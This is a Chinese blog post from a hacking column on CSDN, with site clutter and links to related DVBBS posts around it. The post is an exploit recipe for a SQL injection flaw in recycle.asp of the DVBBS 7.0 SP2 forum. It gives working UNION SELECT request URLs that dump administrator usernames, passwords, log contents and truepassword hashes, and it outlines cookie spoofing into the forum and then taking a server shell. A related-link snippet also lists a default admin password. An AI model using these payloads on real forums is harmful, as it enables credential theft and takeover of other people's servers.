DVBBS 7.0 SP2 注入

最新推荐文章于 2021-03-27 03:22:09 发布
最新推荐文章于 2021-03-27 03:22:09 发布
阅读量2.8k 收藏
点赞数
分类专栏: 黑客技术 文章标签: bbs user shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrub/article/details/456959
版权
DVBBS 7.0 SP2 注入 9xiao & 放手 问题recycle.asp的注入漏洞,利用union查询把dv_log中记录的后台管理账号和密码一次性查询。dv_bbs1是回收站的表 recycle.asp?tablename=dv_bbs1 union select 1,1,userpassword,1,1,1 from dv_admin where id=9 union select 1,1,1,1,1,1 from dv_bbs1&page=1 recycle.asp?tablename=dv_bbs1 union select 1,1,username,1,1,1 from dv_admin where id=9 union select 1,1,1,1,1,1 from dv_bbs1&page=1 id=9 可以变下就暴出全部的后台用户名 recycle.asp?tablename=dv_bbs1 union select 1,1,username,1,1,1 from dv_user where usergroupid=4 union select 1,1,1,1,1,1 from dv_bbs1&page=..暴全部用户名 先暴DV LOG,然后根据后台管理员的用户名。暴出对应的前台管理员用户名,然后暴出前台管理员的TUREPASSWORD,COOKIE欺骗进前台,登陆后台拿SHELL 当然如果LOG里有前台管理员的密码,就更省事了。 暴LOG: recycle.asp?tablename=dv_bbs1 union select 1,1,l_content,1,1,1 from dv_log where l_announceid=0 union select 1,1,1,1,1,1 from dv_bbs1&page=1 得到OLDUSERNAME和PASS后,暴对应的前台用户名: recycle.asp?tablename=dv_bbs1 union select 1,1,adduser,1,1,1 from dv_admin where username="后台用户名" union select 1,1,1,1,1,1 from dv_bbs1&page=1 得到前台管理员用户名。然后得到TUREPASSWORD: recycle.asp?tablename=dv_bbs1 union select 1,1,truepassword,1,1,1 from dv_user where username="前台管理员用户名" union select 1,1,1,1,1,1 from dv_bbs1&page=1
scrub
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
动网论坛Dvbbs v7.0 Sp2 For E线江湖 v8.7 极限版.zip
07-06
使用说明: 1、把check.asp和check0.asp替换江湖原来的文件 2、把BBS目录替换原来的BBS目录 3、默认站长:一线天 密码:admin888 超管密码:admin888    您可以用此帐号登陆论坛更改用户名和密码 4、论坛主数据库data/yxybbs.asp 5、如果您使用了本论坛程序,请保留本站的连接(www.51eline.com) 6、本论坛插件适用于[E线江湖 V8.7极限版](世纪江湖),不保证其他江湖也可用 7、本插件花了两天时间才搞定,很累了,所以暂时不添加个人秀,所以原来在江    湖中调用论坛的个人秀将无法显示,请自行修改连接文件。如果您想继续使用    论坛中的形象设计系统,请关注本站,有时间时会继续研究添加的。 8、请不要在QQ里向本人询问如何安装江湖、安装论坛的问题,本人没有这份时间    和精力来当您的家庭教师,大家可以在一线缘论坛和其他站长讨论,需要本站    服务请阅读本站的服务说明,希望大家理解,感谢大家支持。
DvBBS v6.0(v6.1) 论坛 to BBSxp
10-09
可转换的内容: 1.论坛帖子(包括主题) 2.论坛用户 3.论坛版面(二级以上的版面归到首个分类) 4.论坛分类
dvbbs安装
Briver Song的专栏
12-19 1245
安装dvbbs的时候,我需要安装的是sql server,这个过程有几点需要注意:1 安装数据库的时候,需要对sa用户设置密码,选择系统账号和sa账号共用;2 如果在安装dvbbs时,提示某个文件不能访问(权限不够),则将该文件设置一下权限,如下附件中图一 然后再对提示没有权限的每个文件设置一下权限,如附件中图二     
DVBBS安装
Briver Song的专栏
12-19 5600
安装好IIS,SQLSERVER2000以及.NET Framework 1.1后,出现如下错误:Server Error in / Application. Compilation Error Description: An error occurred during the compilation of a resource required to
dvbbs8.3动网论坛
03-11
动网论坛程序8.3,耗时三天找到的,是目前所有版本中最好用的,欢迎大家下载试用
动网7.0sp2 cookie欺骗原理
kendyhj9999的专栏
03-09 758
动网7.0sp2 cookie欺骗原理 cookie欺骗必须要收集到密文,cookie是怎么收集的呢?不允许上传,不允许html,不允许flash,防止网页带毒,防止asp木马。防止跨站漏洞攻击。建议:强制不允许长时间保存cookie。 是不是只要收集到cookie密文就可以进行cookie欺骗呢?是的,如果password存放在cookie中的话。 动网作这个为什么?相比较而言降低
笑话天地插件 For DVBBS 7.0 SP2
12-27
《笑话天地插件 For DVBBS 7.0 SP2》是一款专为DVBBS 7.0 SP2论坛设计的扩展程序,旨在为用户提供更加趣味盎然的互动体验。这款插件是在网络上广泛流传的DVBBS 6.0版本的基础上进行优化和调整,以适应最新版的DVBBS...
虚拟奥运会游戏插件 for dvbbs7.0 sp2
12-27
虚拟奥运会游戏插件是专为dvbbs7.0 SP2设计的一款互动娱乐工具,它为论坛用户提供了参与模拟奥运会比赛的机会,增强了社区的趣味性和互动性。dvbbs7.0 SP2是一款流行的网络论坛软件,其稳定性和功能强大深受用户喜爱...
天宫之城风格for dvbbs7.0 sp2
12-27
"天宫之城风格for dvbbs7.0 sp2"是一款专为dvbbs7.0 SP2(Service Pack 2)设计的论坛皮肤。dvbbs,全称Discuz! Board,是一款广泛使用的开源论坛软件,由Comsenz公司开发,支持多种功能和插件,便于用户建立和管理...
安装动网论坛dvbbs录像教程 for win2003.zip
09-26
动网2003下安装教程。新手必看。 安装动网论坛录像教程 for win2003.zip
动网DVBBS8.3论坛access版
06-26
动网DVBBS8.3论坛access版 动网论坛
论坛个人专集系统1.0 for dvbbs7.0 sp2
12-27
《论坛个人专集系统1.0 for DVBBS7.0 SP2》是一款专为DVBBS7.0 SP2论坛平台设计的插件,它旨在提升用户在论坛中的个性化体验,通过集成化的专集功能,使用户可以创建、管理和分享自己的个人专集。这个系统的核心在于...
网友翻唱插件b1.0 for dvbbs7.0 sp2
12-27
总的来说,"网友翻唱插件B1.0 for DVBBS7.0 SP2"是一个便捷且实用的工具,它扩展了DVBBS论坛的功能,使得音乐爱好者能够在论坛上分享和交流自己的音乐创作,为论坛注入了更多生活气息和艺术元素。对于论坛管理员来说...
dvbbs论坛的安装
weixin_33995481的博客
02-08 356
去年的时候搭建过好几个论坛,discuz和dvbbs,当时搭建的挺顺利,昨天的时候Boss说要去中软那边去测试,当把虚拟机里搭建的环境从服务器copy到笔记本的时候发现搭建的论坛出问题了,这下子慌了,当时没写笔记记录,乃一大失误,这下出现各种问题,乱了阵脚,今天花费点时间整理一下关于dvbbs论坛的搭建。 dvbbs论坛有三个版本,php、asp、.net的...
DVbbs8.2***思路与总结
weixin_33672109的博客
11-23 106
dvbbs8.2后比较变态,目前还没有特别好的方法,外面有人提到一种方法就是直接上传php文件或者其它服务器支持文件,这个也是一个思路,不过很多时候,单独的服务器不会支持这么多。dvbbs禁用了asp和asp.net的上传,不知道对加密后的支持不。禁用了数据库备份,换取系统的安全。 ***思路: (1)下载database默认地址: data/Dvbbs8.mdb boke/data/Dv...
动网php_动网(DVBBS)PHP论坛preview.php代码执行漏洞
weixin_28741707的博客
03-08 240
动网(DVBBS)论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。在文件preview.php中:require printout('preview'); //第9行……函数printout在文件inc/ dv_clsmain.php中:function printout($template,$ext="tpl.php"){ //第464行文件最后包含了template...
dvbbs php,DVBBS php转换工具使用教程
weixin_36338808的博客
03-27 208
首先需要架好PHP程序运行环境。目前转换程序只有四种,即:一、说明:1、访问你的转换路径,各文件对应的转换说明如下2、asp71ac-to-php10 动网的ASP7.1 AC 转到 动网PHP1.03、asp71sql-to-php10 动网的ASP7.1 MSSQL 转到 动网PHP1.04、dz41-to-php10 DISCUZ4.1 转到 动网PHP1.05、dz50-to-php...
Dvbbs Version 8.2.0 漏洞
热门推荐
stilling2006的专栏
07-19 2万+
影响版本: Powered By Dvbbs Version 8.2.0 Powered By Dvbbs Version 8.1.0 Powered By Dvbbs Version 8.0.0 还是批量,直接Google上面的任一 注册用户-我的主页-个人空间管理 userspace.asp?sid=0&act=modifyset 然后编辑CSS风格【一定要有看到代码才算
Asp上传漏洞解析与检测方法探讨
这种漏洞在2004年被发现并频繁出现在如dvbbs和动力文章系统等网站上,包括Oblog等知名平台。 文章提到的Web编程常见漏洞主要包括: 1. SQL注入:这是通过在用户输入中嵌入恶意SQL语句,导致服务器执行非预期操作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值